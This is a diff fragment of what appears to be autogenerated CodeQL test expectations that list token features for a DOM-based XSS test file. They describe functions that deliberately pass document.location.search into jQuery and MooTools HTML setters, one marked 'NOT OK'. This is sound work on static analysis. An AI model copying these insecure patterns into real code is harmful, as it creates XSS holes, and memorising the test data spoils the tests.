element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:432:3:432:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:432:3:432:3 | $ | enclosingFunctionBody | target document location search $ #foo html target replace /[\\s\\S]*<\\/metadata>/ $ #foo html target replace /<\|>/g | +| autogenerated/Xss/DomBasedXss/tst.js:432:3:432:3 | $ | enclosingFunctionName | nonGlobalSanitizer | +| autogenerated/Xss/DomBasedXss/tst.js:432:3:432:3 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:432:3:432:11 | $("#foo") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:432:3:432:11 | $("#foo") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:432:3:432:11 | $("#foo") | enclosingFunctionBody | target document location search $ #foo html target replace /[\\s\\S]*<\\/metadata>/ $ #foo html target replace /<\|>/g | +| autogenerated/Xss/DomBasedXss/tst.js:432:3:432:11 | $("#foo") | enclosingFunctionName | nonGlobalSanitizer | +| autogenerated/Xss/DomBasedXss/tst.js:432:3:432:11 | $("#foo") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:432:3:432:11 | exceptional return of $("#foo") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:432:3:432:11 | exceptional return of $("#foo") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:432:3:432:11 | exceptional return of $("#foo") | enclosingFunctionBody | target document location search $ #foo html target replace /[\\s\\S]*<\\/metadata>/ $ #foo html target replace /<\|>/g | +| autogenerated/Xss/DomBasedXss/tst.js:432:3:432:11 | exceptional return of $("#foo") | enclosingFunctionName | nonGlobalSanitizer | +| autogenerated/Xss/DomBasedXss/tst.js:432:3:432:11 | exceptional return of $("#foo") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:432:3:432:16 | $("#foo").html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:432:3:432:16 | $("#foo").html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:432:3:432:16 | $("#foo").html | enclosingFunctionBody | target document location search $ #foo html target replace /[\\s\\S]*<\\/metadata>/ $ #foo html target replace /<\|>/g | +| autogenerated/Xss/DomBasedXss/tst.js:432:3:432:16 | $("#foo").html | enclosingFunctionName | nonGlobalSanitizer | +| autogenerated/Xss/DomBasedXss/tst.js:432:3:432:16 | $("#foo").html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:432:3:432:44 | $("#foo ... g, '')) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:432:3:432:44 | $("#foo ... g, '')) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:432:3:432:44 | $("#foo ... g, '')) | enclosingFunctionBody | target document location search $ #foo html target replace /[\\s\\S]*<\\/metadata>/ $ #foo html target replace /<\|>/g | +| autogenerated/Xss/DomBasedXss/tst.js:432:3:432:44 | $("#foo ... g, '')) | enclosingFunctionName | nonGlobalSanitizer | +| autogenerated/Xss/DomBasedXss/tst.js:432:3:432:44 | $("#foo ... g, '')) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:432:3:432:44 | exceptional return of $("#foo ... g, '')) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:432:3:432:44 | exceptional return of $("#foo ... g, '')) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:432:3:432:44 | exceptional return of $("#foo ... g, '')) | enclosingFunctionBody | target document location search $ #foo html target replace /[\\s\\S]*<\\/metadata>/ $ #foo html target replace /<\|>/g | +| autogenerated/Xss/DomBasedXss/tst.js:432:3:432:44 | exceptional return of $("#foo ... g, '')) | enclosingFunctionName | nonGlobalSanitizer | +| autogenerated/Xss/DomBasedXss/tst.js:432:3:432:44 | exceptional return of $("#foo ... g, '')) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:432:5:432:10 | "#foo" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:432:5:432:10 | "#foo" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:432:5:432:10 | "#foo" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17602,6 +122366,26 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:432:5:432:10 | "#foo" | enclosingFunctionBody | target document location search $ #foo html target replace /[\\s\\S]*<\\/metadata>/ $ #foo html target replace /<\|>/g | | autogenerated/Xss/DomBasedXss/tst.js:432:5:432:10 | "#foo" | enclosingFunctionName | nonGlobalSanitizer | | autogenerated/Xss/DomBasedXss/tst.js:432:5:432:10 | "#foo" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:432:13:432:16 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:432:13:432:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:432:13:432:16 | html | enclosingFunctionBody | target document location search $ #foo html target replace /[\\s\\S]*<\\/metadata>/ $ #foo html target replace /<\|>/g | +| autogenerated/Xss/DomBasedXss/tst.js:432:13:432:16 | html | enclosingFunctionName | nonGlobalSanitizer | +| autogenerated/Xss/DomBasedXss/tst.js:432:13:432:16 | html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:432:18:432:23 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:432:18:432:23 | target | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:432:18:432:23 | target | enclosingFunctionBody | target document location search $ #foo html target replace /[\\s\\S]*<\\/metadata>/ $ #foo html target replace /<\|>/g | +| autogenerated/Xss/DomBasedXss/tst.js:432:18:432:23 | target | enclosingFunctionName | nonGlobalSanitizer | +| autogenerated/Xss/DomBasedXss/tst.js:432:18:432:23 | target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:432:18:432:31 | target.replace | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:432:18:432:31 | target.replace | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:432:18:432:31 | target.replace | enclosingFunctionBody | target document location search $ #foo html target replace /[\\s\\S]*<\\/metadata>/ $ #foo html target replace /<\|>/g | +| autogenerated/Xss/DomBasedXss/tst.js:432:18:432:31 | target.replace | enclosingFunctionName | nonGlobalSanitizer | +| autogenerated/Xss/DomBasedXss/tst.js:432:18:432:31 | target.replace | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:432:18:432:43 | exceptional return of target. ... /g, '') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:432:18:432:43 | exceptional return of target. ... /g, '') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:432:18:432:43 | exceptional return of target. ... /g, '') | enclosingFunctionBody | target document location search $ #foo html target replace /[\\s\\S]*<\\/metadata>/ $ #foo html target replace /<\|>/g | +| autogenerated/Xss/DomBasedXss/tst.js:432:18:432:43 | exceptional return of target. ... /g, '') | enclosingFunctionName | nonGlobalSanitizer | +| autogenerated/Xss/DomBasedXss/tst.js:432:18:432:43 | exceptional return of target. ... /g, '') | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:432:18:432:43 | target. ... /g, '') | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:432:18:432:43 | target. ... /g, '') | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:432:18:432:43 | target. ... /g, '') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17609,6 +122393,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:432:18:432:43 | target. ... /g, '') | enclosingFunctionBody | target document location search $ #foo html target replace /[\\s\\S]*<\\/metadata>/ $ #foo html target replace /<\|>/g | | autogenerated/Xss/DomBasedXss/tst.js:432:18:432:43 | target. ... /g, '') | enclosingFunctionName | nonGlobalSanitizer | | autogenerated/Xss/DomBasedXss/tst.js:432:18:432:43 | target. ... /g, '') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:432:25:432:31 | replace | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:432:25:432:31 | replace | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:432:25:432:31 | replace | enclosingFunctionBody | target document location search $ #foo html target replace /[\\s\\S]*<\\/metadata>/ $ #foo html target replace /<\|>/g | +| autogenerated/Xss/DomBasedXss/tst.js:432:25:432:31 | replace | enclosingFunctionName | nonGlobalSanitizer | +| autogenerated/Xss/DomBasedXss/tst.js:432:25:432:31 | replace | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:432:33:432:38 | /<\|>/g | CalleeFlexibleAccessPath | target.replace | | autogenerated/Xss/DomBasedXss/tst.js:432:33:432:38 | /<\|>/g | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:432:33:432:38 | /<\|>/g | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17625,6 +122414,191 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:432:41:432:42 | '' | enclosingFunctionName | nonGlobalSanitizer | | autogenerated/Xss/DomBasedXss/tst.js:432:41:432:42 | '' | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:432:41:432:42 | '' | receiverName | target | +| autogenerated/Xss/DomBasedXss/tst.js:435:1:435:0 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:435:1:435:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:435:1:435:0 | this | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:435:1:435:0 | this | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:435:1:435:0 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:435:1:446:1 | 'arguments' object of function mootools | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:435:1:446:1 | 'arguments' object of function mootools | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:435:1:446:1 | 'arguments' object of function mootools | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:435:1:446:1 | 'arguments' object of function mootools | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:435:1:446:1 | 'arguments' object of function mootools | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:435:1:446:1 | exceptional return of function mootools | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:435:1:446:1 | exceptional return of function mootools | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:435:1:446:1 | exceptional return of function mootools | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:435:1:446:1 | exceptional return of function mootools | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:435:1:446:1 | exceptional return of function mootools | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:435:1:446:1 | functio ... OT OK\\n} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:435:1:446:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:435:1:446:1 | functio ... OT OK\\n} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:435:1:446:1 | return of function mootools | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:435:1:446:1 | return of function mootools | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:435:1:446:1 | return of function mootools | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:435:1:446:1 | return of function mootools | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:435:1:446:1 | return of function mootools | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:435:10:435:17 | mootools | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:435:10:435:17 | mootools | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:435:10:435:17 | mootools | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:436:6:436:11 | source | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:436:6:436:11 | source | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:436:6:436:11 | source | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:436:6:436:11 | source | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:436:6:436:11 | source | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:436:6:436:38 | source | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:436:6:436:38 | source | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:436:6:436:38 | source | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:436:6:436:38 | source | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:436:6:436:38 | source | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:436:6:436:38 | source ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) 